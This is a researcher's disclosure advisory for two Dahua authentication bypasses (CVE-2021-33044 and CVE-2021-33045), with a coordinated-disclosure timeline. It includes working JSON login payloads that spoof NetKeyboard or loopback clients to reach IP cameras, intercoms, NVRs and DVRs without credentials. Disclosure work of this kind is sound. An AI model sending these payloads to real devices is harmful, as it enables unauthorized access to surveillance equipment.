[STX] Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure -=[NetKeyboard Vulnerability]=- CVE-2021-33044 Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":} [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 } -=[Loopback Vulnerability]=- CVE-2021-33045 Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":} [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 } Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 } [ETX]